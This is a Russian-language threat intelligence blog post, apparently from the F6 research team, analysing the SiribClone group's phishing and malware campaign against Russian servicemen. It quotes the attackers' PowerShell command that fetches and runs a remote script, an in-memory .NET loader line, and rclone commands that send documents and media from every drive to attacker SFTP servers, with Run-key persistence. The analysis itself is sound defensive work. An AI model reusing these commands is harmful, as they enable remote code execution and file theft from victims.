Привет! На связи — команда киберразведки (Threat Intelligence) компании F6. Мы выпустили исследование атак новой киберпреступной группировки, которые направлены против российских военных, и делимся его результатами. Военнослужащие ВС РФ – по-прежнему среди приоритетных целей атак киберпреступников, которые занимаются шпионажем и мошенничеством.
Раскрыть инфраструктуру ранее неизвестных злоумышленников помог файл, который эксперты F6 Threat Intelligence обнаружили в феврале 2026 года. Специалисты F6 назвали группировку SiribClone – по метаданным одного из атакующих и используемому инструменту rclone (утилита командной строки с открытым исходным кодом для работы с облачными хранилищами). Несмотря на небольшое количество обнаруженных публичных сэмплов, мы установили, что атакующие активно тестировали свои разработки с декабря 2025 года, а самые ранние следы фишинговой активности злоумышленников датируются летом 2025 года.
Кроме того, в ходе исследования мы выяснили, что группировка распространяет вредоносные файлы для десктопных и мобильных устройств, используя в качестве приманок приложения для «безопасного обмена фотографиями» и другие сервисы, документы на военную тематику, а также активно применяют социальную инженерию для получения доступа к Telegram-аккаунтам российских военнослужащих. Причём участники группировки под видом девушек, «желающих познакомиться», и волонтёров лично общаются с военными через Telegram и другие популярные платформы. Данная активность была зафиксирована в январе-феврале 2026 года, однако по обнаруженным сетевым артефактам можно предположить, что SiribClone применяет фишинг через Telegram с лета 2025 года по настоящее время.
В мае 2026 года, спустя несколько месяцев «молчания» SiribClone, мы обнаружили новые файлы группировки, которые злоумышленники распространяли через сайт, мимикрирующий под тематику Дня Победы («Бессмертный полк»).
Итоги исследования инфраструктуры новой группировки, инструментов, которые используют злоумышленники, представляем в этом блоге.
После прочтения сжечь
Файл, с которого началось наше исследование, был загружен на платформу для анализа файлов. С Google-диска загружался файл под названием «Решение по СВОДУ.zip» по ссылке hxxps://drive[.]google[.]com/file/d/1DjDui8hEf6GXTJeeETXCo1r3NBizj1WR/view?usp=drive_link.
В архиве, защищенном паролем, находится файл «Решение по СВОДУ.docx.lnk». При открытии выполняется следующая команда, открывающая файл-приманку с hxxp://185[.]17[.]3[.]215:11317/content/pt/SVODU.docx и запускающая файл REA.md с GitHub:
/c powershell -c "$i=$env:TEMP+'\SVODU.docx';iwr hxxp://185[.]17[.]3[.]215:11317/content/pt/SVODU.docx -o $i;Start-Process $i;irm hxxps://github[.]com/evon-ch/ob/raw/refs/heads/main/REA[.]md | iex"
Также в самом ярлыке содержались следующие метаданные:
Working directory: C:\Users\s1r1b\DownloadsMachine identifier: zam040k
Скачиваемый файл REA.md представляет собой PowerShell-скрипт, содержащий встроенный массив байтов. Скрипт загружает этот массив в память как .NET сборку и вызывает метод Down() класса Vmngr:
[byte[]]$d=@(<bytes>); [System.Reflection.Assembly]::Load($d); [vmngr]::Down()
Загруженная .NET сборка выполняет роль загрузчика: во временную директорию пользователя загружает файл vmngr.dll с https://github[.]com/evon-ch/ob/raw/refs/heads/main/vmngr.dll. Далее DLL загружается в процесс через LoadLibrary, выполняется ее функция Wrapper, и управление передается основной полезной нагрузке. В артефактах сборки был найден следующий путь: «C:\Users\s1r1b\source\repos\price+\vmngrr\obj\Release\vmngrr.pdb».
Загружаемая vmngr.dll предназначена для эксфильтрации интересующих злоумышленника файлов с использованием rclone. Ее PDB-путь: «C:\Users\s1r1b\source\repos\price+\x64\Release\price++.pdb». Специалисты F6 назвали это ВПО SiribGrabber.
Для получения конфигурации DLL расшифровывает URL-ссылку алгоритмом Base64 → AES CBC, в результате получая URL hxxps://evon-ch.github[.]io/ob/conf.txt. Далее DLL выполняет запрос для получения конфигурации к данной URL, расшифровывает конфигурацию тем же алгоритмом и парсит по набору параметров.
Для загрузки rclone DLL сначала проверяет наличие rclone по пути %LocalAppData%\rc\{rclone_directory_name}, где {rclone_directory_name} должен совпадать с наименованием архива из URL, указанным в параметре “rz_zip_down”. В случае если директория отсутствует, DLL скачивает архив с rclone и сохраняет по файловому пути %LocalAppData%\rc.zip, распаковывает в директорию %LocalAppData%\rc\ и удаляет архив.
Параметр blacklist отвечает за проверку системы по machineGUID. Если значение совпадет со значениями из списка, сэмпл прекращает работу.
Перед подключением выполняет проверку доступности удаленного сервера из конфигурации командой ping.
ping -n 3 -w 2000 {ip}
После проверки подключения с помощью ping к указанным серверам в конфигурации создается профиль подключения rclone.
rclone.exe config create 229 sftp host={ip} user={user} port={port} pass={pass} key_file= key_file_pass= pubkey_file= key_use_agent=false use_insecure_cipher=false disable_hashcheck=false
Параметры {ip}, {user}, {port}, {pass} передаются на ВПО в конфигурации в виде объектов массива «svrs». После успешной конфигурации подключения SiribGrabber выполняет сбор логических дисков. По очереди для каждого диска выполняется команда, цель которой – копирование файлов с заданным набором фильтров с логического диска зараженной системы на удаленное хранилище, подконтрольное злоумышленнику. Копирование происходит в директорию по файловому пути шаблона /rc/{computername}—{machine_guid}/.
Пример команды:
rclone.exe copy --copy-links {drive_path} 229:/rc/{computername}--{machine_guid}/ --filter "+ /" --filter "- /$Recycle.Bin/**" --filter "- /System Volume Information/**" --filter "- /Windows/**" --filter "- /Program Files/**" --filter "- /Program Files (x86)/**" --filter "- /ProgramData/**" --filter "- /PerfLogs/**" --filter "- /Intel/**" --filter "- /AMD/**" --filter "- /NVIDIA/**" --filter "- /MSOCache/**" --filter "- /boot/**" --filter "+ *.pdf" --filter "+ *.doc*" --filter "+ *.odt" --filter "+ *.txt" --filter "+ *.csv" --filter "+ *.xls*" --filter "+ *.ppt*" --filter "+ *.jpg" --filter "+ *.jpeg" --filter "+ *.png" --filter "+ *.gif" --filter "+ *.webp" --filter "+ *.hei*" --filter "+ *.bmp" --filter "+ *.tif*" --filter "+ *.mp4" --filter "+ *.mkv" --filter "+ *.avi" --filter "+ *.mov" --filter "+ *.wm*" --filter "+ *.3gp" --filter "+ *.webm" --filter "+ *.aac" --filter "+ *.flv" --filter "+ *.mp3" --filter "+ *.zip" --filter "+ *.rar" --filter "+ *.7z" --filter "+ *.iso" --filter "+ *.exe" --filter "+ *.msi" --filter "+ *.apk" --filter "- *" --bwlimit 2M --transfers 2 --checkers 4 --buffer-size 16M --ignore-checksum --fast-list --size-only --ignore-existing --retries 100 --retries-sleep 5m --low-level-retries 50
Также для каждого логического диска собранная итоговая команда будет записана в BAT-файл по пути %LocalAppData%/rc/rc{drive}.bat. После чего будет создан одноименный PS1-файл по файловому пути %LocalAppData%/rc/rc{drive}.ps1. Данный файл будет закреплен в системе путем добавления ключа с именем, имеющим шаблон rc{drive}, в ветку реестра HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
Таким образом после исследования файла мы установили два адреса атакующих (185[.]186[.]244[.]57 и 185[.]17[.]3[.]215) и профиль evon-ch в GitHub.
Исследование GitHub-профилей
В профиле evon-ch был найден один репозиторий, первые коммиты в который были сделаны 24 января 2025 года. Активность профиля evon-ch была эпизодической, и большая часть коммитов по всей видимости предназначалась для тестирования и отладки.
Первые коммиты содержали эксперименты над полезной нагрузкой – в виде ps-скрипта, набора байтов или исполняемого файла.
Мы также обнаружили разные версии конфигурации ВПО в коммитах evon-ch. К примеру, начиная с апреля 2026 года атакующий добавил команду для кражи Telegram-сессии (однако по умолчанию папка с данными Telegram находится в другой директории).
В другой конфигурации папка с данными Telegram была указана верно, а эксфильтрация производилась по заготовленному пути «229:/rc/$env:COMPUTERNAME—a5bc6d29-d0a7-4746-b01d-addbf5976d5e/Users/MARS/AppData/Roaming/Telegram Desktop/». Присутствие определенных GUID и имен пользователей в путях может означать, что тестирование конфигураций могло происходить в среде атакующего.
В одном из ранних коммитов полезная нагрузка загружалась по ссылке hxxps://files[.]catbox[.]moe/4nnmhq.dll. Конфигурация для rclone в этом файле 4nnmhq.dll берется с hxxps://github[.]com/s1r1ban/pagesService[.]github[.]io/blob/main/config.txt. Указанные С2 для эксфильтрации: 208[.]92[.]227[.]183 и 185[.]186[.]244[.]57.
Вот так мы обнаружили второй GitHub-профиль атакующих с тем же ником, который фигурировал в PDB-путях DLL (s1r1b) и метаданных LNK, описанных выше. Данный профиль был активен с 24 декабря 2025 года по 6 февраля 2026 года.
В профиле s1r1b коммиты содержали еще более ранние конфигурации для тестирования. Интересно, что в данном репозитории конфигурация была зашифрована тем же ключом, что и в описанном сэмпле.
Также в метаданных LNK из части «После прочтения сжечь» обнаружили ник zam040k. По нему удалось найти некоторые комментарии шестилетней давности на украинских форумах и старый GitHub-аккаунт.
Исследование сетевой инфраструктуры
Благодаря исследованию первоначального файла и GitHub-профилей удалось обнаружить, что атакующими в качестве С2 в конфигурациях ВПО использовались следующие адреса:
· 185[.]17[.]3[.]215;
· 185[.]186[.]244[.]57;
· 208[.]92[.]227[.]183.
С помощью графового анализа мы нашли следующие индикаторы, связанные с атакующими:
· IP 185[.]17[.]3[.]215 и 185[.]139[.]69[.]136 были связаны общим SSH-отпечатком.
· Также следующие IP были связаны одним ETag: 185[.]17[.]3[.]215, 185[.]139[.]69[.]136, 208[.]92[.]227[.]183, 185[.]186[.]244[.]57, 104[.]128[.]140[.]74.
Наибольший интерес представляют следующие два адреса – 185[.]186[.]244[.]57 и 185[.]17[.]3[.]215 – из-за расположенных на них веб-страниц «КОНТУР» и «Telegram Session Manager».
На указанных адресах была расположена страница входа в менеджер похищенных Telegram-сессий. Изначально приложение не имело названия и было размещено на адресе 185[.]186[.]244[.]57, а затем «переехало» на новый адрес 185[.]17[.]3[.]215 уже с названием «КОНТУР». «КОНТУР» – внутреннее приложение атакующих, которое они используют для просмотра сообщений скомпрометированных аккаунтов. Про сам способ получения доступа к аккаунтам можно узнать в полной версии блога на сайте F6.
![Рисунок 19 – Страница входа на страницу с IP 185[.]17[.]3[.]215](https://habrastorage.org/r/w1560/getpro/habr/upload_files/60e/54f/50a/60e54f50a0aedcd6ffa34541d9ccc284.png "Рисунок 19 – Страница входа на страницу с IP 185[.]17[.]3[.]215")
Изнутри приложение выглядит следующим образом: слева находится список скомпрометированных аккаунтов, справа – список каналов и чатов жертвы. Данные похищенных сессий хранятся в базе данных. Атакующие также добавили возможность «заметок» по жертвам: краткое описание личности, геолокации и должности, а также кем был «отработан» пользователь.
Исходя из анализа заметок злоумышленников можно сделать вывод, что цель их атак – военнослужащие ВС РФ, которые находятся на приграничных территориях и в зоне проведения СВО. Судя по описанию геолокаций атакованных пользователей, упоминаниям их званий и войсковых частей, задача атакующих – военный шпионаж.
На найденных IP-адресах располагались несколько доменов. Они были предназначены для фишинговых страниц со входом через Telegram. Мы нашли несколько заготовок страниц на различные темы: «облачное хранилище», «присоединение к каналу», «видеоплеер TkTk» и другие.
Продолжение исследования, подробности, примеры фишинговых страниц для угона аккаунтов и распространения вредоносного ПО, индикаторы компрометации – в блоге на сайте F6.
ссылка на оригинал статьи https://habr.com/ru/articles/1043744/